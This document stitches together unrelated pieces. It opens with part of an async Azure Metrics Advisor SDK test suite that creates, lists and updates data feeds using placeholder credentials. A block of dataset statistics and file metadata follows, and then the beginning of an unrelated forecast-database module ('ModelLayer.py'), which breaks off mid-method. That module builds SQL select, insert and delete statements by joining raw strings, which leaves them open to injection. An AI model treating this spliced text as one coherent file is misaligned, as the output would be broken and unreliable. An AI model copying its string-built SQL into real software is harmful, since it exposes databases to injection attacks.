granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 10, 1),
),
)
if self.is_live:
variables["data_feed_id"] = data_feed.id
assert data_feed.id is not None
assert data_feed.created_time is not None
assert data_feed.name is not None
assert data_feed.source.data_source_type == "AzureCosmosDB"
assert data_feed.source.database == "adsample"
assert data_feed.source.collection_id == "adsample"
assert data_feed.source.sql_query == "'SELECT * FROM Items I where I.Timestamp >= @StartTime and I.Timestamp < @EndTime'"
finally:
await self.clean_up(client.delete_data_feed, variables)
return variables
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_create_data_feed_with_application_insights(self, client, variables):
name = self.create_random_name("applicationinsights")
if self.is_live:
variables["data_feed_name"] = name
async with client:
try:
query = "let gran=60m; let starttime=datetime(@StartTime); let endtime=starttime + gran; requests | " \
"where timestamp >= starttime and timestamp < endtime | summarize request_count = count(), " \
"duration_avg_ms = avg(duration), duration_95th_ms = percentile(duration, 95), " \
"duration_max_ms = max(duration) by resultCode"
data_feed = await client.create_data_feed(
name=variables["data_feed_name"],
source=AzureApplicationInsightsDataFeedSource(
azure_cloud="Azure",
application_id="3706fe8b-98f1-47c7-bf69-b73b6e53274d",
api_key="application_insights_api_key",
query=query
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2021, 7, 1),
),
)
if self.is_live:
variables["data_feed_id"] = data_feed.id
assert data_feed.id is not None
assert data_feed.created_time is not None
assert data_feed.name is not None
assert data_feed.source.data_source_type == "AzureApplicationInsights"
assert data_feed.source.application_id == "3706fe8b-98f1-47c7-bf69-b73b6e53274d"
assert data_feed.source.query is not None
finally:
await self.clean_up(client.delete_data_feed, variables)
return variables
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_create_data_feed_with_data_explorer(self, client, variables):
name = self.create_random_name("azuredataexplorer")
if self.is_live:
variables["data_feed_name"] = name
async with client:
try:
query = "let StartDateTime = datetime(@StartTime); let EndDateTime = StartDateTime + 1d; " \
"adsample | where Timestamp >= StartDateTime and Timestamp < EndDateTime"
data_feed = await client.create_data_feed(
name=variables["data_feed_name"],
source=AzureDataExplorerDataFeedSource(
connection_string="azure_data_explorer_connection_string",
query=query
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 1, 1),
),
)
if self.is_live:
variables["data_feed_id"] = data_feed.id
assert data_feed.id is not None
assert data_feed.created_time is not None
assert data_feed.name is not None
assert data_feed.source.data_source_type == "AzureDataExplorer"
assert data_feed.source.query == query
finally:
await self.clean_up(client.delete_data_feed, variables)
return variables
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_create_data_feed_with_influxdb(self, client, variables):
name = self.create_random_name("influxdb")
if self.is_live:
variables["data_feed_name"] = name
async with client:
try:
data_feed = await client.create_data_feed(
name=variables["data_feed_name"],
source=InfluxDbDataFeedSource(
connection_string="influxdb_connection_string",
database="adsample",
user_name="adreadonly",
password="influxdb_password",
query="'select * from adsample2 where Timestamp = @StartTime'"
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 1, 1),
),
)
if self.is_live:
variables["data_feed_id"] = data_feed.id
assert data_feed.id is not None
assert data_feed.created_time is not None
assert data_feed.name is not None
assert data_feed.source.data_source_type == "InfluxDB"
assert data_feed.source.query is not None
assert data_feed.source.database == "adsample"
assert data_feed.source.user_name == "adreadonly"
finally:
await self.clean_up(client.delete_data_feed, variables)
return variables
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_create_data_feed_with_datalake(self, client, variables):
name = self.create_random_name("datalake")
if self.is_live:
variables["data_feed_name"] = name
async with client:
try:
data_feed = await client.create_data_feed(
name=variables["data_feed_name"],
source=AzureDataLakeStorageGen2DataFeedSource(
account_name="adsampledatalakegen2",
account_key="azure_datalake_account_key",
file_system_name="adsample",
directory_template="%Y/%m/%d",
file_template="adsample.json"
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost", display_name="Cost"),
DataFeedMetric(name="revenue", display_name="Revenue")
],
dimensions=[
DataFeedDimension(name="category", display_name="Category"),
DataFeedDimension(name="city", display_name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 1, 1),
),
)
if self.is_live:
variables["data_feed_id"] = data_feed.id
assert data_feed.id is not None
assert data_feed.created_time is not None
assert data_feed.name is not None
assert data_feed.source.data_source_type == "AzureDataLakeStorageGen2"
assert data_feed.source.account_name == "adsampledatalakegen2"
assert data_feed.source.file_system_name == "adsample"
assert data_feed.source.directory_template == "%Y/%m/%d"
assert data_feed.source.file_template == "adsample.json"
finally:
await self.clean_up(client.delete_data_feed, variables)
return variables
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_create_data_feed_with_mongodb(self, client, variables):
name = self.create_random_name("mongodb")
if self.is_live:
variables["data_feed_name"] = name
async with client:
try:
data_feed = await client.create_data_feed(
name=variables["data_feed_name"],
source=MongoDbDataFeedSource(
connection_string="mongodb_connection_string",
database="adsample",
command='{"find": "adsample", "filter": { Timestamp: { $eq: @StartTime }} "batchSize": 2000,}'
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 1, 1),
),
)
if self.is_live:
variables["data_feed_id"] = data_feed.id
assert data_feed.id is not None
assert data_feed.created_time is not None
assert data_feed.name is not None
assert data_feed.source.data_source_type == "MongoDB"
assert data_feed.source.database == "adsample"
assert data_feed.source.command == '{"find": "adsample", "filter": { Timestamp: { $eq: @StartTime }} "batchSize": 2000,}'
finally:
await self.clean_up(client.delete_data_feed, variables)
return variables
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_create_data_feed_with_mysql(self, client, variables):
name = self.create_random_name("mysql")
if self.is_live:
variables["data_feed_name"] = name
async with client:
try:
data_feed = await client.create_data_feed(
name=variables["data_feed_name"],
source=MySqlDataFeedSource(
connection_string="mysql_connection_string",
query="'select * from adsample2 where Timestamp = @StartTime'"
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 1, 1),
),
)
if self.is_live:
variables["data_feed_id"] = data_feed.id
assert data_feed.id is not None
assert data_feed.created_time is not None
assert data_feed.name is not None
assert data_feed.source.data_source_type == "MySql"
assert data_feed.source.query == "'select * from adsample2 where Timestamp = @StartTime'"
finally:
await self.clean_up(client.delete_data_feed, variables)
return variables
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_create_data_feed_with_postgresql(self, client, variables):
name = self.create_random_name("postgresql")
if self.is_live:
variables["data_feed_name"] = name
async with client:
try:
data_feed = await client.create_data_feed(
name=variables["data_feed_name"],
source=PostgreSqlDataFeedSource(
connection_string="postgresql_connection_string",
query="'select * from adsample2 where Timestamp = @StartTime'"
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 1, 1),
),
)
if self.is_live:
variables["data_feed_id"] = data_feed.id
assert data_feed.id is not None
assert data_feed.created_time is not None
assert data_feed.name is not None
assert data_feed.source.data_source_type == "PostgreSql"
assert data_feed.source.query == "'select * from adsample2 where Timestamp = @StartTime'"
finally:
await self.clean_up(client.delete_data_feed, variables)
return variables
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_list_data_feeds(self, client):
async with client:
feeds = client.list_data_feeds()
feeds_list = []
async for item in feeds:
feeds_list.append(item)
assert len(feeds_list) > 0
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_list_data_feeds_with_data_feed_name(self, client):
async with client:
feeds = client.list_data_feeds(data_feed_name="azureSqlDatafeed")
feeds_list = []
async for item in feeds:
feeds_list.append(item)
assert len(feeds_list) == 1
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_list_data_feeds_with_skip(self, client):
all_feeds = client.list_data_feeds()
skipped_feeds = client.list_data_feeds(skip=10)
all_feeds_list = []
async for item in all_feeds:
all_feeds_list.append(item)
skipped_feeds_list = []
async for item in skipped_feeds:
skipped_feeds_list.append(item)
assert len(all_feeds_list) > len(skipped_feeds_list)
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_list_data_feeds_with_status(self, client):
async with client:
feeds = client.list_data_feeds(status="Active")
feeds_list = []
async for item in feeds:
feeds_list.append(item)
assert len(feeds_list) > 0
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_list_data_feeds_with_source_type(self, client):
async with client:
feeds = client.list_data_feeds(data_source_type="SqlServer")
feeds_list = []
async for item in feeds:
feeds_list.append(item)
assert len(feeds_list) > 0
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_list_data_feeds_with_granularity_type(self, client):
async with client:
feeds = client.list_data_feeds(granularity_type="Daily")
feeds_list = []
async for item in feeds:
feeds_list.append(item)
assert len(feeds_list) > 0
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer(data_feed=True)
@recorded_by_proxy_async
async def test_update_data_feed_with_model(self, client, variables):
async with client:
try:
update_name = "update" + str(uuid.uuid4())
if self.is_live:
variables["data_feed_updated_name"] = update_name
data_feed = await client.get_data_feed(variables["data_feed_id"])
data_feed.name = variables["data_feed_updated_name"]
data_feed.data_feed_description = "updated"
data_feed.schema.timestamp_column = "time"
data_feed.ingestion_settings.ingestion_begin_time = datetime.datetime(2021, 12, 10)
data_feed.ingestion_settings.ingestion_start_offset = 1
data_feed.ingestion_settings.data_source_request_concurrency = 1
data_feed.ingestion_settings.ingestion_retry_delay = 120
data_feed.ingestion_settings.stop_retry_after = 1
data_feed.rollup_settings.rollup_type = "AlreadyRollup"
data_feed.rollup_settings.rollup_method = "Sum"
data_feed.rollup_settings.rollup_identification_value = "sumrollup"
data_feed.rollup_settings.auto_rollup_group_by_column_names = []
data_feed.missing_data_point_fill_settings.fill_type = "CustomValue"
data_feed.missing_data_point_fill_settings.custom_fill_value = 2
data_feed.access_mode = "Public"
data_feed.viewers = ["updated"]
data_feed.status = "Paused"
data_feed.action_link_template = "updated"
data_feed.source.connection_string = "updated"
data_feed.source.query = "get data"
await client.update_data_feed(data_feed)
updated = await client.get_data_feed(variables["data_feed_id"])
assert updated.name == variables["data_feed_updated_name"]
assert updated.data_feed_description == "updated"
assert updated.schema.timestamp_column == "time"
assert updated.ingestion_settings.ingestion_begin_time == datetime.datetime(2021, 12, 10, tzinfo=tzutc())
assert updated.ingestion_settings.ingestion_start_offset == 1
assert updated.ingestion_settings.data_source_request_concurrency == 1
assert updated.ingestion_settings.ingestion_retry_delay == 120
assert updated.ingestion_settings.stop_retry_after == 1
assert updated.rollup_settings.rollup_type == "AlreadyRollup"
assert updated.rollup_settings.rollup_method == "Sum"
assert updated.rollup_settings.rollup_identification_value == "sumrollup"
assert updated.missing_data_point_fill_settings.fill_type == "CustomValue"
assert updated.missing_data_point_fill_settings.custom_fill_value == 2
assert updated.access_mode == "Public"
assert updated.viewers == ["updated"]
assert updated.status == "Paused"
assert updated.action_link_template == "updated"
assert updated.source.query == "get data"
finally:
await self.clean_up(client.delete_data_feed, variables)
return variables
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer(data_feed=True)
@recorded_by_proxy_async
async def test_update_data_feed_with_kwargs(self, client, variables):
async with client:
try:
data_feed = await client.get_data_feed(variables["data_feed_id"])
update_name = "update" + str(uuid.uuid4())
if self.is_live:
variables["data_feed_updated_name"] = update_name
await client.update_data_feed(
data_feed.id,
name=variables["data_feed_updated_name"],
data_feed_description="updated",
timestamp_column="time",
ingestion_begin_time=datetime.datetime(2021, 9, 10),
ingestion_start_offset=1,
data_source_request_concurrency=1,
ingestion_retry_delay=120,
stop_retry_after=1,
rollup_type="AlreadyRollup",
rollup_method="Sum",
rollup_identification_value="sumrollup",
auto_rollup_group_by_column_names=[],
fill_type="CustomValue",
custom_fill_value=2,
access_mode="Public",
viewers=["updated"],
status="Paused",
action_link_template="updated",
source=SqlServerDataFeedSource(
connection_string="updated",
query="get data"
)
)
updated = await client.get_data_feed(variables["data_feed_id"])
assert updated.name == variables["data_feed_updated_name"]
assert updated.data_feed_description == "updated"
assert updated.schema.timestamp_column == "time"
assert updated.ingestion_settings.ingestion_begin_time == datetime.datetime(2021, 9, 10, tzinfo=tzutc())
assert updated.ingestion_settings.ingestion_start_offset == 1
assert updated.ingestion_settings.data_source_request_concurrency == 1
assert updated.ingestion_settings.ingestion_retry_delay == 120
assert updated.ingestion_settings.stop_retry_after == 1
assert updated.rollup_settings.rollup_type == "AlreadyRollup"
assert updated.rollup_settings.rollup_method == "Sum"
assert updated.rollup_settings.rollup_identification_value == "sumrollup"
assert updated.missing_data_point_fill_settings.fill_type == "CustomValue"
assert updated.missing_data_point_fill_settings.custom_fill_value == 2
assert updated.access_mode == "Public"
assert updated.viewers == ["updated"]
assert updated.status == "Paused"
assert updated.action_link_template == "updated"
assert updated.source.query == "get data"
finally:
await self.clean_up(client.delete_data_feed, variables)
return variables
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer(data_feed=True)
@recorded_by_proxy_async
async def test_update_data_feed_with_model_and_kwargs(self, client, variables):
async with client:
try:
update_name = "update" + str(uuid.uuid4())
if self.is_live:
variables["data_feed_updated_name"] = update_name
data_feed = await client.get_data_feed(variables["data_feed_id"])
data_feed.name = variables["data_feed_updated_name"]
data_feed.data_feed_description = "updateMe"
data_feed.schema.timestamp_column = "don't update me"
data_feed.ingestion_settings.ingestion_begin_time = datetime.datetime(2021, 9, 22)
data_feed.ingestion_settings.ingestion_start_offset = 2
data_feed.ingestion_settings.data_source_request_concurrency = 2
data_feed.ingestion_settings.ingestion_retry_delay = 2
data_feed.ingestion_settings.stop_retry_after = 2
data_feed.rollup_settings.rollup_type = "don't update me"
data_feed.rollup_settings.rollup_method = "don't update me"
data_feed.rollup_settings.rollup_identification_value = "don't update me"
data_feed.rollup_settings.auto_rollup_group_by_column_names = []
data_feed.missing_data_point_fill_settings.fill_type = "don't update me"
data_feed.missing_data_point_fill_settings.custom_fill_value = 4
data_feed.access_mode = "don't update me"
data_feed.viewers = ["don't update me"]
data_feed.status = "don't update me"
data_feed.action_link_template = "don't update me"
data_feed.source.connection_string = "don't update me"
data_feed.source.query = "don't update me"
await client.update_data_feed(
data_feed,
timestamp_column="time",
ingestion_begin_time=datetime.datetime(2021, 9, 10),
ingestion_start_offset=1,
data_source_request_concurrency=1,
ingestion_retry_delay=120,
stop_retry_after=1,
rollup_type="AlreadyRollup",
rollup_method="Sum",
rollup_identification_value="sumrollup",
auto_rollup_group_by_column_names=[],
fill_type="CustomValue",
custom_fill_value=2,
access_mode="Public",
viewers=["updated"],
status="Paused",
action_link_template="updated",
source=SqlServerDataFeedSource(
connection_string="updated",
query="get data"
)
)
updated = await client.get_data_feed(variables["data_feed_id"])
assert updated.name == variables["data_feed_updated_name"]
assert updated.data_feed_description == "updateMe"
assert updated.schema.timestamp_column == "time"
assert updated.ingestion_settings.ingestion_begin_time == datetime.datetime(2021, 9, 10, tzinfo=tzutc())
assert updated.ingestion_settings.ingestion_start_offset == 1
assert updated.ingestion_settings.data_source_request_concurrency == 1
assert updated.ingestion_settings.ingestion_retry_delay == 120
assert updated.ingestion_settings.stop_retry_after == 1
assert updated.rollup_settings.rollup_type == "AlreadyRollup"
assert updated.rollup_settings.rollup_method == "Sum"
assert updated.rollup_settings.rollup_identification_value == "sumrollup"
assert updated.missing_data_point_fill_settings.fill_type == "CustomValue"
assert updated.missing_data_point_fill_settings.custom_fill_value == 2
assert updated.access_mode == "Public"
assert updated.viewers == ["updated"]
assert updated.status == "Paused"
assert updated.action_link_template == "updated"
assert updated.source.query == "get data"
finally:
await self.clean_up(client.delete_data_feed, variables)
return variables
@pytest.mark.skip("skip test")
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer(data_feed=True)
@recorded_by_proxy_async
async def test_update_data_feed_by_reseting_properties(self, client, variables):
async with client:
try:
data_feed = await client.get_data_feed(variables["data_feed_id"])
update_name = "update" + str(uuid.uuid4())
if self.is_live:
variables["data_feed_updated_name"] = update_name
await client.update_data_feed(
data_feed.id,
name=variables["data_feed_updated_name"],
data_feed_description=None,
timestamp_column=None,
ingestion_start_offset=None,
data_source_request_concurrency=None,
ingestion_retry_delay=None,
stop_retry_after=None,
rollup_type=None,
rollup_method=None,
rollup_identification_value=None,
auto_rollup_group_by_column_names=None,
fill_type=None,
custom_fill_value=None,
access_mode=None,
viewers=None,
status=None,
action_link_template=None,
)
updated = await client.get_data_feed(variables["data_feed_id"])
assert updated.name == variables["data_feed_updated_name"]
# assert updated.data_feed_description == "" # doesn't currently clear
# assert updated.schema.timestamp_column == "" # doesn't currently clear
assert updated.ingestion_settings.ingestion_begin_time == datetime.datetime(2019, 10, 1, tzinfo=tzutc())
assert updated.ingestion_settings.ingestion_start_offset == -1
assert updated.ingestion_settings.data_source_request_concurrency == 0
assert updated.ingestion_settings.ingestion_retry_delay == -1
assert updated.ingestion_settings.stop_retry_after == -1
assert updated.rollup_settings.rollup_type == "NoRollup"
assert updated.rollup_settings.rollup_method == "None"
assert updated.rollup_settings.rollup_identification_value is None
assert updated.missing_data_point_fill_settings.fill_type == "SmartFilling"
assert updated.missing_data_point_fill_settings.custom_fill_value == 0
assert updated.access_mode == "Private"
# assert updated.viewers == ["viewers"] # doesn't currently clear
assert updated.status == "Active"
# assert updated.action_link_template == "updated" # doesn't currently clear
finally:
await self.clean_up(client.delete_data_feed, variables)
return variables
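# Sketch of the record/playback convention these tests follow: per-run values are
# generated only when the test is live and stashed in `variables`, so playback
# against a recorded session reuses the same names; each test returns `variables`
# so the recording proxy can persist them. The helper below is hypothetical, for
# illustration only -- it is not part of devtools_testutils.
def resolve_recorded_name(variables, key, make_name, is_live):
    # In live mode mint a fresh value; in playback reuse the recorded one.
    if is_live:
        variables[key] = make_name()
    return variables[key]

# Illustrative usage inside a test method:
#     name = resolve_recorded_name(variables, "data_feed_name",
#                                  lambda: self.create_random_name("testfeed"),
#                                  self.is_live)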
| 50.618826
| 138
| 0.573627
| 5,036
| 54,314
| 5.890191
| 0.059571
| 0.09763
| 0.064188
| 0.027307
| 0.87095
| 0.853184
| 0.835856
| 0.805616
| 0.773826
| 0.763847
| 0
| 0.009813
| 0.348952
| 54,314
| 1,072
| 139
| 50.666045
| 0.829049
| 0.010863
| 0
| 0.74558
| 0
| 0.004912
| 0.100374
| 0.016385
| 0
| 0
| 0
| 0
| 0.207269
| 1
| 0
| false
| 0.000982
| 0.010806
| 0
| 0.028487
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
49a490ffde21853d418bf362e235f837327f237f
| 65,831
|
py
|
Python
|
local/Model/ModelLayer.py
|
markusj1201/le_flask_alpha
|
d86f7de41abdae257350c853d16fc57b67231501
|
[
"MIT"
] | 1
|
2020-01-27T20:48:22.000Z
|
2020-01-27T20:48:22.000Z
|
local/Model/ModelLayer.py
|
markusj1201/le_flask_alpha
|
d86f7de41abdae257350c853d16fc57b67231501
|
[
"MIT"
] | null | null | null |
local/Model/ModelLayer.py
|
markusj1201/le_flask_alpha
|
d86f7de41abdae257350c853d16fc57b67231501
|
[
"MIT"
] | 1
|
2020-01-30T14:00:20.000Z
|
2020-01-30T14:00:20.000Z
|
#DB Configuration
def GetConfig():
config = {'server' : 'localhost',
'database' : 'LEForecastDatabase',
'UID' : '',
'password' : ''}
return config
def ValidateAndClauseArguments(kw_dict, table_name, DBobj):
from Model import BPXDatabase as bpx
from Model import QueryFile as qf
col_query = qf.ColumnQuery(table_name)
results = DBobj.Query(col_query)
col_list = results[1]['column_name'].to_list()
clause = []
for key, value in kw_dict.items():
if key in col_list:
in_clause = AddInClause(value)
clause.append(key + ' in ' + in_clause)
if kw_dict:
stmt = 'where '
count = 1
for item in clause:
if count == 1:
stmt = stmt + item
else:
stmt = stmt + ' and ' + item
count = count + 1
else:
stmt = ''
return stmt
def AddInClause(item_list):
count = 1
ret = '('
for item in item_list:
if count != len(item_list):
ret = ret + '\'' + str(item) + '\', '
else:
ret = ret + '\'' + str(item) + '\')'
count = count + 1
return ret
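# Note: AddInClause splices quoted values directly into the SQL text, which breaks
# on embedded quotes and is injection-prone. A hedged sketch of the parameterized
# alternative using DB-API '?' placeholders (as pyodbc accepts); this helper is
# illustrative and not part of this module:
def AddInClauseParams(item_list):
    # Build 'in (?, ?, ...)' plus the parameter list for cursor.execute(sql, params).
    placeholders = ', '.join('?' for _ in item_list)
    return 'in (' + placeholders + ')', list(item_list)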
def ReadFromTables(DBObj, table_name, where_clause):
from Model import BPXDatabase as bpx
#Check the where_clause to make sure it is not empty:
# before, after = str.split(where_clause, 'where ')
# if not after:
# where_clause = ''
#Form basic select statement
stmt = 'select * from ' + table_name + ' ' + where_clause
results = DBObj.Query(stmt)
return results[1]
class ForecastHeader:
def __init__(self, DBObj, WellName=[], CorpID=[], ForecastName=[]):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
self.table = 'Forecast_Header'
self.WellName = WellName
self.CorpID = CorpID
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
self.ForecastName = ForecastName
def ReadTable(self):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
import pandas as pd
Success = True
Messages = []
header_df = pd.DataFrame()
try:
#Create dictionary to pass to where clause
where_dict = {}
if self.WellName:
where_dict['WellName'] = self.WellName
if self.CorpID:
where_dict['CorpID'] = self.CorpID
if self.ForecastName:
where_dict['ForecastName'] = self.ForecastName
#Interpret key words as clauses used to filter query
where_clause = m.ValidateAndClauseArguments(where_dict, self.table, self.DBObj)
header_df = m.ReadFromTables(self.DBObj, self.table, where_clause)
#Convert df to table row objects
rows = []
for idx, item in header_df.iterrows():
Arps_Dict = {}
Arps_Dict['b'] = item['DCA_b']
Arps_Dict['qi'] = item['DCA_qi']
Arps_Dict['Di'] = item['DCA_Di']
row = m.ForecastHeaderRow(item['WellName'], item['CorpID'], item['ForecastName'], item['GFOzYear'], item['Aries_ScenarioID'], Arps_Dict,
item['GFOz'], self.DBObj)
rows.append(row)
except Exception as ex:
rows = []
Success = False
Messages.append('Error reading from the database. ' + str(ex))
return rows, Success, Messages
class ForecastHeaderRow:
def __init__(self, WellName, CorpID, ForecastName, ForecastYear, scenarioName, Arps, GFO, DBObj):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
import pandas as pd
self.WellName = WellName
self.CorpID = CorpID
self.ForecastName = ForecastName
self.ForecastYear = ForecastYear
self.scenarioName = scenarioName
if Arps:
self.Di = str(Arps['Di'])
self.qi = str(Arps['qi'])
self.b = str(Arps['b'])
else:
self.Di = ''
self.qi = ''
self.b = ''
if GFO:
self.GFO = GFO
else:
self.GFO = False
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
def Write(self, Update_User, Update_Date):
from datetime import datetime
Success = True
Messages = []
try:
if isinstance(Update_Date, datetime):
Update_Date = Update_Date.strftime('%Y-%m-%d %H:%M:%S')
hdr_insert_statement = 'insert into [LEForecastDatabase].[dbo].[Forecast_Header] (WellName, CorpID, ForecastName, GFOz, \n'\
'GFOzYear, Aries_ScenarioID, DCA_Di, DCA_qi, DCA_b, Update_Date, Update_User)\n'\
' values (\'' + self.WellName + '\', \'' + self.CorpID + '\', \'' + self.ForecastName + '\', \'' + str(self.GFO) + '\',\n'\
'\'' + str(self.ForecastYear) + '\', \'' + self.scenarioName + '\', \'' + str(self.Di) + '\', \'' + str(self.qi) + '\', \'' + str(self.b) + '\'\n'\
', convert(datetime, \'' + Update_Date + '\', 120), \'' + Update_User + '\')'
Success, Message = self.DBObj.Command(hdr_insert_statement)
if Success:
self.DBObj.Command('commit')
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error writing to the database. ' + str(ex))
return Success, Messages
def Update(self, Update_User, Update_Date):
from Model import ModelLayer as m
Success = True
Messages = []
try:
#Primary keys for Forecast Header table, Query the table for existing entry
#ForecastName, CorpID
ForecastHeaderObj = m.ForecastHeader(self.DBObj, [], [self.CorpID], [self.ForecastName])
rows, Success, Message = ForecastHeaderObj.ReadTable()
if not Success:
Messages.append(Message)
if len(rows) > 1 or not Success:
Success = False
Messages.append('Unsuccessful in attempt to find single entry of header.')
elif len(rows) == 0:
#If no row exists, go ahead and write one
Success, Message = self.Write(Update_User, Update_Date)
Messages.append(Message)
else:
Success, Message = self.Delete()
if Success:
Success, Message = self.Write(Update_User, Update_Date)
Messages.append(Message)
if not Success:
rows[0].Write(Update_User, Update_Date)
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error updating the Forecast Data table. ' + str(ex))
return Success, Messages
def Delete(self):
Success = True
Messages = []
try:
delete_stmt = 'delete from [LEForecastDatabase].[dbo].[Forecast_Header] where ForecastName = \'' + self.ForecastName + '\' and CorpID = \'' + self.CorpID + '\''
Success, Message = self.DBObj.Command(delete_stmt)
if not Success:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error during delete operation. ' + str(ex))
return Success, Messages
class ForecastData:
def __init__(self, DBObj, HeaderName=[], CorpID=[], Date_Key = []):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
import pandas as pd
self.table = 'Forecast_Data'
self.HeaderName = HeaderName
self.CorpID = CorpID
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
self.Date_Key = Date_Key
def ReadTable(self):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
import pandas as pd
from datetime import datetime
Success = True
Messages = []
header_df = pd.DataFrame()
try:
#Create dictionary to pass to where clause
where_dict = {}
if self.HeaderName:
where_dict['HeaderName'] = self.HeaderName
if self.CorpID:
where_dict['CorpID'] = self.CorpID
if self.Date_Key:
if isinstance(self.Date_Key[0], datetime):
self.Date_Key[0] = self.Date_Key[0].strftime('%Y-%m-%d %H:%M:%S')
where_dict['Date_Key'] = self.Date_Key
#Interpret key words as clauses used to filter query
